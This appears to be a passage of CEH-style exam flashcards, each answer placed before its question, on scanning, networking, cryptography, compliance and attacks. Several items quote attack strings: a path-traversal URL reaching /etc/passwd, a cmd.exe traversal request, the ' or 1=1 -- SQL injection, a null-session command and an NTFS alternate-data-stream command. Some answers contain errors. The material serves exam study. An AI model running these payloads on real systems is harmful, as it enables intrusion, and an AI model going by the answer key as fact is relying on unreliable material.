Which of the following tools is used to obfuscate binary code in an executable so that it is undetectable by anti-virus software? A)Cygwin B)ChewBacca C)CyberGate D)g++ E)SwayzCryptor
C)Routers
Which of the following use a rule-based access model? A)NTFS permissions B)US military C)Routers D)Hubs
C)SHA 1
Which of the following uses 160 bits for hashing? A)MD5 B)SHA 2 C)SHA 1 D)SHA 3
C)iptables
Which of the following versions of the Linux firewall is required for Linux kernel versions 2.4x and above? A)NPF B)ipfwadm C)iptables D)ipchains
D. PCI DSS (Payment Card Industry Data Security Standard)
Which of the following was created to protect credit card data at rest and in transit in an effort to reduce fraud? A. TCSEC B. Common Criteria C. ISO 27002 D. PCI DSS
C. SOX (Sarbanes-Oxley Act)
Which of the following was created to protect shareholders and the general public from corporate accounting errors and fraudulent practices, and to improve the accuracy of corporate disclosures? A. GLBA B. HIPAA C. SOX D. FITARA
C)Mantrap
Which of the following would be an appropriate mitigation for tailgating? A)Redundancy B)Account lockout policy C)Mantrap D)iptables
C. Netcraft
Which of the following would be the best choice for footprinting restricted URLs and OS information from a target? A. www.archive.org B. www.alexa.com C. Netcraft D. Yesware
C. A guard posted outside the door
Which of the following would be the best example of a deterrent control? A. A log aggregation system B. Hidden cameras onsite C. A guard posted outside the door D. Backup recovery systems
A)The same key is used to encrypt and decrypt data.
Which one of the following statements best describes symmetric encryption? A)The same key is used to encrypt and decrypt data. B)Data is hashed and signed by a digital signature issued from a trusted third-party. C)One private key is used to encrypt and another public key is used to decrypt data. D)Data is concealed in ignored sections of files.
A)CSIRT
Which organization provides an incident response service to act as a reliable and trusted single point of contact for reporting computer security incidents worldwide? A)CSIRT B)GSI C)NIST D)OWASP
Tailgating
Which physical security issues is mitigated by a mantrap?
A)80
Which port is the most likely to be open on a web server? A)80 B)23 C)25 D)3389
D)80
Which port number is used by the HTTPTunnel tool to bypass a firewall? A)666 B)22 C)3389 D)80
C. TCP 53
Which protocol and port number combination is used by default for DNS zone transfers? A. UDP 53 B. UDP 161 C. TCP 53 D. TCP 22
B)ICMP C)UDP
Which protocols are used by default when executing a traceroute in UNIX/Linux and Windows? (Choose all that apply.) A)RTP B)ICMP C)UDP D)TCP
VoIP enumeration
___ provide sensitsive information such as VoIP gateway/servers, IP-PBX systems, client software (softwphones)/VoIP phones User-agent IP addresses and user extensions
C)The attacker sends personnel an email that appears to come from an individual with the authority to request confidential information, but the email includes a bogus link.
Which scenario demonstrates a phishing attack? A)The attacker attempts to gain confidential information, especially login credentials, by looking over an authorized user's shoulder. B)A program writes data to a buffer until it overruns the buffer's boundary and overwrites adjacent memory locations. C)The attacker sends personnel an email that appears to come from an individual with the authority to request confidential information, but the email includes a bogus link. D)The attacker attempts to steal passwords through an innocent looking application.
File permissions
Which security control can prevent data access by a hacker interacting and modifying HTML on a web server?
Controlling the use of USB ports
Which security policy will mitigate the copying of sensitive data to a USB drive?
D)Wassenaar Arrangement
Which standard provides guidelines for the responsible and open transfer of conventional arms and sensitive or dual-use military resources? A)ISO 2700 B)Rainbow Books C)Common Criteria D)Wassenaar Arrangement
Trusted Computer System Evaluation Criteria (TCSEC)
Which standard uses divisions called security assurance levels to evaluate products?
Information Technology Security Evacuation Criteria (ITSEC)
Which standard uses levels called security functional requirements to access security functionality?
D)Restore systems to normal service operation as quickly as possible
Which statement best describes the purpose of incident management? A)Log all incidents that take place in an organization B)Trigger alerts to prevent potential risks and threats C)Analyze vulnerabilities as quickly as possible D)Restore systems to normal service operation as quickly as possible
Session hijacking is an attack that aims at stealing a legitimate session and posing as that user while communicating with the web reousrece
Which statement defines session hijacking most accurately?
B)Static NAT uses a one-to-many mapping
Which statement is FALSE with regard to network address translation (NAT)? A)Dynamic NAT uses a many-to-many mapping B)Static NAT uses a one-to-many mapping C)Static NAT uses a one-to-one mapping D)PAT uses a many-to-one mapping
B)SSL operates above the Transport layer.
Which statement is true about SSL? A)SSL is protected against CBC attacks. B)SSL operates above the Transport layer. C)SSL is an active encryption standard. D)SSL encrypts each message independently.
A)GAK
Which term refers to the statutory obligation of companies to disclose their cryptographic keys to government agencies? A)GAK B)TPM C)key escrow D)PKI
B)Protection profiles C)Evaluation assurance levels
Which two of the following are key components of the Common Criteria evaluation system? A)Security functional requirements B)Protection profiles C)Evaluation assurance levels D)Security assurance levels
Phlashing
Which type of DDoS attack can damage actual networking hardware?
SYN flooding
Which type of DDoS attack takes advantage of the TCP three way handshake to overwhelm the victims listening que?
B)Polymorphic shellcode
Which type of IDS evasion technique hides commonly used strings with encoding and uses a stub to decode and execute differently each time? A)ASCII shellcode B)Polymorphic shellcode C)Packet fragmentation D)Overlapping fragments
Dynamic NAT
Which type of NAT uses a many-to-many mapping model?
Port Address Translation (PAT)
Which type of NAT uses a one-to-many mapping model?
Static NAT
Which type of NAT uses a one-to-one mapping model?
B)Rule-based access control
Which type of access control is supported by standard routers? A)Role-based access control B)Rule-based access control C)Mandatory access control D)Discretionary access control
MAC flood attacks
Which type of attack can be prevented by using port security to create static ARP entries in the MAC table?
SYN flood
Which type of attack exploits the TCP handshake process?
B. White box
Which type of attack is generally conducted as an inside attacker with elevated privileges on the resources? A. Gray box B. White box C. Black box D. Active reconnaissance
MAC flood attack
Which type of attack sends many frames with bogus MAC addresses as the source?
Session fragmentation
Which type of attack splits the attack payload into many packet fragments?
Switches
Which type of device is targeted by MAC flood attacks?
C) Hardware
Which type of keylogger cannot be detected by antivirus software? A) Stealth B) Heuristic C) Hardware D) Software
Brute force
Which type of password attack attempts every combination of characters?
White box
Which type of penetration test requires the test to have complete knowledge of the target system(s)?
Black box
Which type of penetration test requires the test to have no knowledge of the target system(s)?
Gray box
Which type of penetration test requires the tester to have only limited knowledge of the target system(s)
A) FIN
Which type of port scan sets only the flag that brings TCP conversations to an orderly close? A) FIN B) RST C) IDLE D) XMAS
B)WPA2
Which wireless encryption mechanism uses AES? A)WEP B)WPA2 C)WPA D)LEAP
Hactivism
Which word refers to hacking for a specific cause?
SNMP
___ was designed to manage IP-enabled devices across a network.
C)Gateway between an inside and outside network that is located on the public side of the DMZ and is designed to defend against attacks aimed at the inside network
While implementing a demilitarized zone (DMZ) to protect several network resources, your company decides to implement a bastion host. What is the BEST description of this device? A)Component that restricts access between an internal network and the Internet or between other sets of networks B)Resource, usually located on the DMZ, that pretends to be a real target, but is really an isolated resource where the attacker cannot do any real damage C)Gateway between an inside and outside network that is located on the public side of the DMZ and is designed to defend against attacks aimed at the inside network D)System fitted with two network interfaces that sits between a public, untrusted network and an internal network to provide secure access
B)Tails
While researching specific security issues for your company, you want to use an anonymizer to ensure that your privacy is protected. Which of the following is NOT an anonymizer? A)TOR B)Tails C)Psiphon D)Proxify
text viewers
Whitespace Steganography Because spaces and tabs are generally not visible in ___, therefore the message is effectively hidden from casual observers
SNOW
Whitespace Steganography Use ___ tool to hide the message
built-in encryption
Whitespace Steganography Use of ___ makes the message unreadable even if it is detected
-To hide the source IP address so that they can hack without any legal corollary -To mask the actual source of the attack by impersonating a fake source address of the proxy -To remotely access intranets and other website resources that are normally off limits -To interrupt all the requests sent by a user and transmit them to a third destination, hence victims will only be able to identify the proxy server address -Attackers chain multiple proxy servers to avoid detection
Why attackers use proxy servers?
Privacy and anonymity Protects from online attacks Access restricted content Bypass IDS and Firewall rules
Why use Anonymizer?
To hide malicious file content within a benign file
Why would a hacker utilize alternate data streams (ADS)?
D)Evade detection by the IDS
Why would an attacker work very slowly when performing a ping scan of the network? A)Reduce the network traffic B)Ensure all machines are scanned C)Give the targets more time to respond D)Evade detection by the IDS
determine the security context
Windows operating system uses access tokens to ___ of a process or thread
802.11
Wireless LAN standards created by IEEE
Hub
Wireless access points function as a ____.
A. When the primary SOA record serial number is higher than the secondary's
Within the DNS system, a primary server (SOA) holds and maintains all records for the zone. Secondary servers will periodically ask the primary if there have been any updates, and if updates have occurred, they will ask for a zone transfer to update their own copies. Under what conditions will the secondary name server request a zone transfer from a primary? A. When the primary SOA record serial number is higher than the secondary's B. When the secondary SOA record serial number is higher than the primary's C. Only when the secondary reboots or restarts services D. Only when manually prompted to do so
Motive
____ originates out of the notion that the target system stores or processes something valuable and this leads to threat of an attack on the system
D)On Linux/Unix machines, there is no response.
You are a network security analyst for your company. You perform the following scan from a remote machine: nmap -sX 141.8.225.72 You use WireShark to capture the response packets. How do you determine which ports are open? A)On Windows machines, there is no response. B)On all machines, there is SYN/ACK response. C)On all machines, there is RST response. D)On Linux/Unix machines, there is no response.
B)Block all traffic over port 110.
You are a security administrator working in Chicago. The Chicago office currently has a policy in place that users should not read personal email on corporate devices. However, you have recently noticed a lot of POP3 traffic over your network even though your company's email service uses SMTP and IMAP. The office manager requests that you block POP3 traffic at the firewall. What should you do? A)Block all traffic over port 25. B)Block all traffic over port 110. C)Block incoming traffic over port 110. D)Block incoming traffic over port 25.
D)Using a mobile app to gain access to internal networks
You are a security analyst evaluating possible threats using Blackberry mobile devices. Which best describes a blackjacking attack? A)Using a mobile app to gain access to the Blackberry Enterprise Server (BES) B)Using the Blackberry Enterprise Server (BES) to limit the rights of mobile apps C)Using the Blackberry Enterprise Server (BES) to block mobile app installation D)Using a mobile app to gain access to internal networks
C)Restore from local backup media
You are a security analyst hired by a company to determine their possible response strategies to various cloud computing threats. You determine that their current cloud provider is vulnerable to SQL injection attacks. Their current versions of virtual OSes are also prone to kernel-level rootkits. If an attacker exploits both of these vulnerabilities, which response strategy would you recommend they use to sanitize an affected virtual machine? A)Roll back to the latest cloud storage snapshot B)Copy and replace key system files from an unaffected virtual machine C)Restore from local backup media D)Run a virus scan to quarantine and delete any detected files
A) The port is open
You are performing a FIN scan and get no response from a port. What does this indicate? A) The port is open B) The port is closed C) The scan has failed to reach the target D) None of the above
C)Limit the frequency of manual installations in patch management plan
You are a security consultant for a large retail chain. You have been asked to help the company establish the appropriate procedures to ensure that they comply with the PCI-DSS standard. Which of the following guidelines is NOT required for compliance? A)Restrict physical access to cardholder data B)Assign a unique ID to each person with computer access C)Limit the frequency of manual installations in patch management plan D)Install and maintain a firewall configuration to protect cardholder data
A)Perform a Boolean-based blind SQL injection attack, and include the results in the audit report.
You are an ethical hacker. You recently gained consent from an online healthcare service company to begin a series of penetration tests. These tests should only be performed during off-peak hours on Saturday and Sunday, so as not to greatly affect existing patients. You identify a SQL injection vulnerability in the account logon form. Which of the following actions would most likely NOT violate your professional code of conduct? A)Perform a Boolean-based blind SQL injection attack, and include the results in the audit report. B)Perform a WAITFOR DELAY blind SQL injection attack, and run an endless loop to stall database services. C)Perform a standard SQL injection attack, and retrieve patient records to attach to the audit report. D)Perform a standard SQL injection attack, and drop all tables required for appointment information.
A) APNIC
You are asked to test a client headquartered in Japan. Which regional registry should you begin competitive intelligence research with? A) APNIC B) RIPE C) ASIANIC D) ARIN E) LACNIC
A. > server ADNS_SERVER ... > set type=HINFO > ATARGET_SYSTEM ...
You are attempting to find out the operating system and CPU type of systems in your target organization. The DNS server you wish to use for lookup is named ADNS_Server, and the target machine you want the information on is ATARGET_SYSTEM. Which of the following nslookup command series is the best choice for discovering this information? (The output of the commands is redacted.) A. > server ADNS_SERVER ... > set type=HINFO > ATARGET_SYSTEM ... B. > server ATARGET_SYSTEM ... > set type=HINFO > ADNS_SERVER ... C. > server ADNS_SERVER ... > set ATARGET_SYSTEM > type=HINFO ... D. > server type=HINFO ... > set ADNS_SERVER > ATARGET_SYSTEM ...
D)23
You are concerned about an employee's use of Telnet when connecting to routers and switches to administer these devices. You would like to perform a port scan on all of these devices to identify any that are still enabled for Telnet. Which open port number(s) are you looking for in the results? A)80 B)21 C)135 to 139 D)23
D)Black box
You are concerned about external hackers gaining control of a new web application. With that threat actor in mind, which of the following tests would be appropriate? A)White box B)Gray box C)Clear box D)Black box
http://www.verigon.com/script.ext?template=%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 %0D%70%61%73%73%77%64 = passwd
You are concerned that your Web server could be attacked with an obstructed URL. You want to configure a rule on the IDS to alert you when a strange Unicode request occurs. Which of the following is an example of a strange Unicode request? A)GET /scripts/..%255c../windows/system32/cmd.exe?/c+dir HTTP/1.1 200 B)GET /cgi- bin/cvslog.cgi=<SCRIPT>management.alert</SCRIPT> HTTP/1.1 403 C)GET /AAAAAAAAAAAAAAAAAAAA\ x90\x90\x90\x83\xec\x27\xeb\x0c\xe7\xe1\xe6\xc1\xc0\xff 500 D)http://www.verigon.com/script.ext?template=%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 %0D%70%61%73%73%77%64 = passwd
D)permit 220.60.6.6 192.168.5.62/29 RDP 3389
You are configuring a firewall to allow the CTO to connect remotely to a number of workstations located in the corporate network. The CTO will use his company-issued notebook with a remote IP address of 220.60.6.6. The corporate network contains hosts in the 192.168.5.62/29 range. Which firewall rule should be added to allow the required RDP connections? A)permit 192.168.5.56/29 220.60.6.6 RDP 3389 B)permit 220.60.6.6 192.168.5.0/29 RDP 3389 C)permit 220.60.6.6 192.168.5.62/29 RDP 443 D)permit 220.60.6.6 192.168.5.62/29 RDP 3389
B)Add a rule to allow ICMP Fragmentation-DF-Set messages to enter the network, but not to leave it. D)Add a rule to allow TTL-Exceed and Port-Unreachable messages to only enter the network, not to leave it. E)Add a rule to only allow ICMP Echo-Request and Echo Reply messages for connections originating from within the network.
You are configuring your corporate firewall. You must prevent anyone from outside the network from using traceroute to gather information about your network while still allowing the use of the tool within the network. Which actions can you take? (Choose all that apply.) A)Add a rule to allow ICMP Fragmentation-DF-Set messages to leave the network, but not to enter it. B)Add a rule to allow ICMP Fragmentation-DF-Set messages to enter the network, but not to leave it. C)Add a rule to allow TTL-Exceed and Port-Unreachable messages to only leave the network, not to enter it. D)Add a rule to allow TTL-Exceed and Port-Unreachable messages to only enter the network, not to leave it. E)Add a rule to only allow ICMP Echo-Request and Echo Reply messages for connections originating from within the network. F)Add a rule to only allow ICMP Echo-Request and Echo Reply messages for connections originating from outside the network.
A)Triple-homed bastion host
You are consulting with a company on how best to implement a firewall architecture to meet their needs. The company is a cloud service provider that must allow access to virtual machines and other virtual services while denying access to development and other internal services. Only paying customers and their clients should be allowed access to virtual services. The company requires the highest security solution to optimize availability to their paying customers. Which boundary protection appliance should you recommend they include to meet their requirements? A)Triple-homed bastion host B)High-interaction honeypot C)Dual-homed bastion host D)Low-interaction honeypot
B)Bottom-of-Stack D)Label E)Time-to-Live F)Traffic Class
You are describing to a team member how multiprotocol label switching (MPLS) is implemented to handle VPN traffic across the Internet. MPLS prefixes label stack entries to each network packet. Which fields comprise a label stack entry? (Choose all that apply.) A)Checksum B)Bottom-of-Stack C)Destination Port D)Label E)Time-to-Live F)Traffic Class G)Offset H)Source Port
C)Negligence and liability
You are engaging a penetration testing provider to identify possible vulnerabilities within your organization. You are about to sign the confidentially agreement and non-disclosure agreement (NDA). What should you verify in the legal language before signing them? A)Checklist of testing requirements B)Rules of engagement C)Negligence and liability D)Fees and project schedule
A. Public (read-only) and Private (read/write)
You are enumerating a subnet. While examining message traffic, you discover SNMP is enabled on multiple targets. If you assume default settings in setting up enumeration tools to use SNMP, which community strings should you use? A. Public (read-only) and Private (read/write) B. Private (read-only) and Public (read/write) C. Read (read-only) and Write (read/write) D. Default (both read and read/write)
D. 52.93.31.255
You are examining a host with an IP address of 52.93.24.42/20 and want to determine the broadcast address for the subnet. Which of the following is the correct broadcast address for the subnet? A. 52.93.24.255 B. 52.93.0.255 C. 52.93.32.255 D. 52.93.31.255 E. 52.93.255.255
A. The host will be attempting to retrieve an HTML file. D. The packet returned in answer to this SYN request will acknowledge the sequence number by returning 10.
You are examining a packet capture of all traffic from a host on the subnet. The host sends a segment with the SYN flag set in order to set up a TCP communications channel. The destination port is 80, and the sequence number is set to 10. Which of the following statements are not true regarding this communications channel? (Choose all that apply.) A. The host will be attempting to retrieve an HTML file. B. The source port field on this packet can be any number between 1024 and 65535. C. The first packet from the destination in response to this host will have the SYN and ACK flags set. D. The packet returned in answer to this SYN request will acknowledge the sequence number by returning 10.
A) The password policy for the machine is weak
You are examining captured LM hash passwords. Several of the passwords hashes in the file end in "1404EE". Which of the following is true? A) The password policy for the machine is weak B) The password policy for this machine is strong C) The hashes have been salted D) The same password has been used for many accounts
C) Establish a null session for 210.55.44.66
You are examining log files and come across this command line entry: net use \210.55.44.66\IPC$ ""/u:"" What is this attempting to do? A) Create a listening port on 210.55.44.66 B) Perform a denial of service attack on 210.55.44.66 C) Establish a null session for 210.55.44.66 D) Connect to a Linux machine
D. A firewall is prohibiting connection.
You are examining traffic and notice an ICMP Type 3, Code 13 response. What does this normally indicate? A. The network is unreachable. B. The host is unknown. C. Congestion control is enacted for traffic to this host. D. A firewall is prohibiting connection.
B. It appears to be part of an XMAS scan. D. It appears port 4083 is closed.
You are examining traffic between hosts and note the following exhange: Source Prot Port Flag Destination 192.168.5.12 TCP 4082 FIN/URG/PSH 192.168.5.50 192.168.5.12 TCP 4083 FIN/URG/PSH 192.168.5.50 192.168.5.12 TCP 4084 FIN/URG/PSH 192.168.5.50 192.168.5.50 TCP 4083 RST/ACK 192.168.5.12 192.168.5.12 TCP 4085 FIN/URG/PSH 192.168.5.50 Which of the following statements are true regarding this traffic? (Choose all that apply.) A. It appears to be part of an ACK scan. B. It appears to be part of an XMAS scan. C. It appears port 4083 is open. D. It appears port 4083 is closed.
A)0x0182bd0bd4444bf836077a718ccdf409
You are hardening the CEO's laptop against boot sector viruses by setting the MBR to read-only and enabling password protection in the system BIOS. The BIOS uses a hashing algorithm similar to LAN Manager to generate a checksum that is stored on the FlashROM. Based on the following checksums, which password is the most secure? A)0x0182bd0bd4444bf836077a718ccdf409 B)0x0182bd0bd4444bf8aad3b435b51404ee C)0xaebd4de384c7ec43aad3b435b51404ee D)0x44efce164ab921caaad3b435b51404ee
D)Perform a risk assessment
You are heading a committee that is responsible for creating your company's security policies. What should you do FIRST? A)Train and educate users about security awareness B)Develop the new security policies based on company needs C)Collect standard guidelines to help guide the committee D)Perform a risk assessment
B)echo bad stuff > good.txt:shh
You are identifying system vulnerabilities on a NTFS system. Which of the following command-line statements is an example of alternate data streams (ADS)? A)type bad stuff < good.txt;shh B)echo bad stuff > good.txt:shh C)echo bad stuff > good.txt;shh D)type bad stuff < good.txt:shh
D)Integrity
You are implementing MD5 hashing for all read-only files on critical company servers. If any files are tampered with, then the MD5 hash value will not match. Which element of information security does MD5 hashing provide? A)Confidentiality B)Availability C)Non-repudiation D)Integrity
A)Filter user input with client-side validation and use parameter placeholders.
You are investigating a Perl script that contains the following code: my $user = $q -> param('username'); my $pwd = $q -> param('password'); my $sth = $dbh -> prepare("SELECT authcode FROM customers WHERE uname = '$user' & pwd = '$pwd'"); $sth->execute(); Which modification(s), if any, should you make to prevent SQL injection attacks? A)Filter user input with client-side validation and use parameter placeholders. B)Add robust error handling for user input and provide detailed client-side messages. C)Encrypt all user input on the client-side and tables and columns in the database. D)No modification is necessary.
B)Bind the compilation file (.exe) to winlogon.exe
You are learning to create Trojans by using wrapper tools. You write the following endless loop: #include <iostream> using namespace std; int main( ) { bool done = false; while (!done) { cerr << "Warning, Warning--Trojan running--Warning! Warning!" << endl; } } How would you use a wrapper tool to hide this malware inside of the legitimate Windows executable winlogon.exe? A)Bind the library file (.lib) to winlogon.exe B)Bind the compilation file (.exe) to winlogon.exe C)Bind the declaration file (.h) to winlogon.exe D)Bind the implementation file (.cpp) to winlogon.exe
B. allintitle:CEH V9
You are looking for pages with the terms CEH and V9 in their title. Which Google hack is the appropriate one? A. inurl:CEHinurl:V9 B. allintitle:CEH V9 C. intitle:CEHinurl:V9 D. allinurl:CEH V9
A. intitle:intranet inurl:intranet+intext:"human resources"
You are looking information on an organization and would like to see what human resources information may be available publicly. Which of the following Google searches look for a website title of "intranet" with part of the URL containing the word "intranet" and the words "human resources" somewhere in the web page? A. intitle:intranet inurl:intranet+intext:"human resources" B. site:"human resources"+intext:intranet C. cache:"human resources"site:sharepoint+inurl:intranet D. related:human resources inurl:intranet
D) The firewall for the DMZ subnet is not performing stateful inspection
You are performing an ACK scan against a network form an external location. You've identified two web servers on the DMZ subnet and notice that they are responding to the ACK scan. Which of the following best describes the situation? A) They are both IIS servers B) They are both Apache servers C) The IDS is not functioning for the DMZ subnet D) The firewall for the DMZ subnet is not performing stateful inspection
C. Stateful
You are performing an ACK scan against a target subnet. You previously verified connectivity to several hosts within the subnet but want to verify all live hosts on the subnet. Your scan, however, is not receiving any replies. Which type of firewall is most likely in use at your location? A. Packet filtering B. IPS C. Stateful D. Active
D)192.168.1.65-126
You are performing an internal scan of a private subnet with the following command: hping3 -1 192.168.1.127 All hosts are configured with the subnet mask 255.255.255.192. Which IP address or range of addresses will be scanned as a result of running this command? A)192.168.1.127 B)192.168.1-254 C)192.168.1.1-126 D)192.168.1.65-126
A. The response indicates an open port.
You are port scanning a system and begin sending TCP packets with the ACK flag set. Examining the return packets, you see a return packet for one port has the RST flag set and the TTL is less than 64. Which of the following is true? A. The response indicates an open port. B. The response indicates a closed port. C. The response indicates a Windows machine with a non-standard TCP/IP stack. D. ICMP is filtered on the machine.
C)Security assessment F)Incident response G)Security training
You are presenting a proposal to the company CEO on engaging Foundstone for IT security services. Which of the following solution(s) does Foundstone provide? (Choose all that apply.) A)Cyberinsurance B)Business continuity planning C)Security assessment D)Grayhat hacking E)Cloud storage security F)Incident response G)Security training
C)The system was compromised.
You are responsible for reviewing the event logs for several servers. Auditing is enabled on all the computers. Recently during a review, you noticed that there is a four-hour gap in the events contained in the security event log for one server. The security event log contains events before and after the four-hour gap. You check the other logs on the same server and do not notice any time gaps. What is most likely the reason for this time gap in the security event log? A)The system was not running. B)The security event log was full. C)The system was compromised. D)Auditing was disabled on the system.
B)Store all tapes in a secured location on site
You are reviewing a company's backup and recovery procedures. Which of the following practices will increase the likelihood of failure during tape recovery? A)Restore backups on a regular basis B)Store all tapes in a secured location on site C)Rotate backups across multiple tapes D)Perform read-after-write and full verification
D) SNMP walk
You are reviewing log files and results from a day of penetration testing. Examine this small section of scan results: ... System.sysUpTime.0:vTimesticks:(136589017) 13 days, 14:47:30 System.sysContact.0: DISPLAY STRING- (ascii) : System.sysName.0: DISPLAY STRING0 (ascii): Router 1 System.sysLocation.0: DISPLAY STRING- (ascii): ... Which scan or attack was used to generate this output? A) Nmap XMAS scan B) Hping session hijack attempt C) Firewalk D) SNMP walk
A)Change to extractedDataLength >= 65536
You are reviewing source code for any buffer overflow vulnerabilities. The following C++ source code handles data extracted from a compressed file: if (extractedDataLength < 65536) { //Break down data into multiple chunks } else { //Handle data in one large chunk } The data should be broken down into multiple chunks only when the buffer of 65,536 characters is reached or exceeded. How should you modify the condition in the first line of the code? A)Change to extractedDataLength >= 65536 B)Change to extractedDataLength == 65536 C)Change to extractedDataLength <= 65536 D)Change to extractedDataLength > 65536
D)SQL injection
You are reviewing the log files for your company's primary Web server. You notice that there are several instances where the following request is made: SELECT login_id, full_name FROM customers Which attack type could this represent? A)Buffer overflow B)Cross-site scripting C)Cross-site request forgery D)SQL injection
D)-sC
You are running a high-level vulnerability scan using the Nmap utility. The network systems include Windows machines running Internet Information Service (IIS). Which switch should you use to automate and customize vulnerability scanning for different Windows OS and SSL vulnerabilities? A)-sU B)--webxml C)-sO D)-sC
A)There is no stateful firewall installed on the DMZ perimeter.
You are scanning a company's DMZ perimeter using Nmap: sudo nmap -sA 62.77.0.1 Starting Nmap 6.49 ( https://nmap.org ) at 2016-05-09 17:00 EDT Nmap scan report for 62.77.0.1 Host is up (0.013s latency). All 1000 scanned ports on 62.77.0.1 are unfiltered MAC Address: 28:C6:8E:79:4D:22 (Netgear,) Nmap done: 1 IP address (1 host up) scanned in 1.88 seconds Which of the following statements is true of the Nmap results? A)There is no stateful firewall installed on the DMZ perimeter. B)There is a stateful firewall installed on the DMZ perimeter. C)All ports are closed on the DMZ firewall. D)All ports are open on the DMZ firewall.
D. Use HTTP tunneling.
You are separated from your target subnet by a firewall. The firewall is correctly configured and allows requests only to ports opened by the administrator. In firewalking the device, you find that port 80 is open. Which technique could you employ to send data and commands to or from the target system? A. Encrypt the data to hide it from the firewall. B. Use session splicing. C. Use MAC flooding. D. Use HTTP tunneling.
E. CNAME
You are setting up DNS for your enterprise. Server A is both a web server and an FTP server. You want to advertise both services for this machine as name references your customers can use. Which DNS record type would you use to accomplish this? A. NS B. SOA C. MX D. PTR E. CNAME
B)SQL injection
You are testing a web application for a travel service. The web application uses a back-end database to store customer accounts and itineraries. You enter the following username value into the customer registration form: ' or 1=1 -- Which type of attack are you attempting? A)XXS B)SQL injection C)SYN Flood D)CSRF
Network Tools Pro
_____ assists in troubleshooting, diagnosing, monitoring and discovering devices on the network
D)Enforce the company security policy.
You are the security administrator for your company. You write security policies and conduct assessments to protect the company's network. An IT technician reports that he has discovered an unauthorized wireless access point attached to the company network. An employee has used the wireless access point to connect several of his personal devices to the network. Employees are not allowed to connect any personal devices to the network without prior consent from their supervisor and the IT department head. The employee explains that he used the wireless access point because he needed company data on his personal devices. What should you do? A)Configure the firewall to prevent such incidents in the future. B)Allow the devices to remain attached because the reason is sound. C)Configure the IDS to prevent such incidents in the future. D)Enforce the company security policy.
C)Network sniffer
You are thinking like a potential attacker. MAC flooding can compromise the security of your network switches. Once the attack is successful, the attacker could capture sensitive data being transmitted between other computers. Which other tool would an attacker need to complete this objective? A)Password cracker B)Vulnerability scanner C)Network sniffer D)Port scanner
A)yes
You are using NetCat to send TCP messages between two Linux hosts. Both hosts should keep sending data until the either host terminates the session. Which Linux command should you pipe to NetCat? A)yes B)echo C)wait D)tar
B)Layer 2 broadcast frame
You are using a sniffer and you see a frame with a destination address of 0xFFFFFFFFFFFF. What type of frame is this? A)Layer 3 broadcast address B)Layer 2 broadcast frame C)Layer 3 network ID D)Layer 2 network ID
C)The host decrements the TTL value by one and forwards the packet to the next host.
You are using traceroute to map the route a packets travel over a network. Which of the following statements is true when using this tool? A)The host decrements the TTL value by one and returns the packet to the previous host. B)The host increments the TTL value by one and forwards the packet to the next host. C)The host decrements the TTL value by one and forwards the packet to the next host. D)The host increments the TTL value by one and returns the packet to the previous host.
B)Incident response is part of incident handling, and incident handling is part of incident management.
You are working with another security professional to design your company's incident response procedures. Which of the following statements is true? A)Incident management is part of incident response, and incident response is part of incident handling. B)Incident response is part of incident handling, and incident handling is part of incident management. C)Incident handling is part of incident response, and incident response is part of incident management. D)Incident response is part of incident management, and incident management is part of incident handling.
C)With the POST method and HTTPS (TLS)
You are working with the web site of an online university. The admissions department requires Social Security numbers (SSN) as personally identifiable information (PII) to associate students with their financial aid packages. The student's SSN should not be available to man-in-the-middle attacks. How should the SSNs be sent to the web server? A)With the GET method and HTTPS (SSL) B)With the POST method and HTTP C)With the POST method and HTTPS (TLS) D)With the GET method and HTTP
C)Healthcare records
You are your company's security administrator. Your company has recently opened a new division. The division head explains to you the Privacy Rule for HIPAA. Which type of record is affected by this? A)Employee records B)Credit card records C)Healthcare records D)Financial records
company's infrastructure details
You can gather ____ from job postings
B)Acknowledgement of a data packet
You capture the following TCP frames using Wireshark: 343 61.586595 208.44.193.36 192.168.1.3 TCP (TCP segment of a reassembled PDU] 344 61.590149 192.168.1.3 208.44.193.36 TCP 3202 > http [FIN, ACK] Seq=986 Ack=25462 Win=17520 Len=0 345 61.590208 208.44.193.36 192.168.1.3 HTTP HTTP/1.1 404 Not Found (text/html) 346 61.590264 192.168.1.3 208.44.193.36 TCP 3203 > http [RST, ACK] Seq=987 Ack=25797 Win=0 Len=0 347 66.229719 192.168.1.3 208.44.193.36 TCP 3206 > http [SYN] Seq=0 Len=0 MSS=1460 348 66.369449 208.44.193.36 192.168.1.3 TCP http > 3206 [SYN, ACK] Seq=O Ack=1 Win=l460 Len=0 MSS=l460 349 66.369526 192.168.1.3 208.44.193.36 TCP 3206 > http [ACK] Seq=1 Ack=1 Win=17520 Len=0 350 66.369745 192.168.1.3 208.44.193.36 HTTP GET /images/product-images/practicetest/Image:cert-312-50.png HTTP/1.1 351 66.736536 208.44.193.36 192.168.1.3 TCP http > 3206 [ACK] Seq=1 Ack=625 Win=63616 Len=0 352 66.913117 208.44.193.36 192.168.1.3 TCP [TCP segment of a reassembled PDU] 353 66.927650 208.44.193.36 192.168.1.3 TCP [TCP segment of a reassembled PDU] 354 66.927706 192.168.1.3 208.44.193.36 TCP 3206 > http [ACK] Seq=625 Ack=2025 Win=17520 Len=0 355 66.948746 192.168.1.3 208.44.193.36 TCP 3207 > http [SYN] Seq=0 Len=0 MSS=1460 356 67.145268 208.44.193.36 192.168.1.3 TCP [TCP Previous segment lost] [TCP Segment of a reassembled PDU] What is the purpose of frame 354? A)Final acknowledgement in a TCP handshake B)Acknowledgement of a data packet C)First step in the TCP handshake D)Second step in the TCP handshake
B)126.123.64.0/19
You detect an attempted ICMP echo scan using the broadcast address 126.123.95.255. You need to determine which network devices were potential targets. Which subnet was likely targeted by the scan? A)126.123.64.0/17 B)126.123.64.0/19 C)126.123.64.0/18 D)126.123.64.0/20
D)Sniffs NFS traffic on the network
You discover that an attacker has used filesnarf to attack your network. Which of the following best describes what this tool does? A)Discovers hosts and services on a computer network. B)Automates the import of log data from over 200 common network devices C)Floods a switched LAN with random MAC addresses D)Sniffs NFS traffic on the network
Unable to connect to the Internet, but able to connect to other wireless stations
You have 25 computers connected to a wireless access point that is providing an IP address in the 192.168.5.0/24 network and a default gateway address 192.168.5.1/24 to the clients. If the default gateway is not routing traffic sent to the gateway to a public IP address, how will clients be affected? A)Unable to connect to the Internet or to other wireless stations B)Able to connect to the Internet and to other wireless stations C)Able to connect to the Internet, but unable to connect to other wireless stations D)Unable to connect to the Internet, but able to connect to other wireless stations
A. ip.addr==192.168.22.5 && tcp contains HR_admin
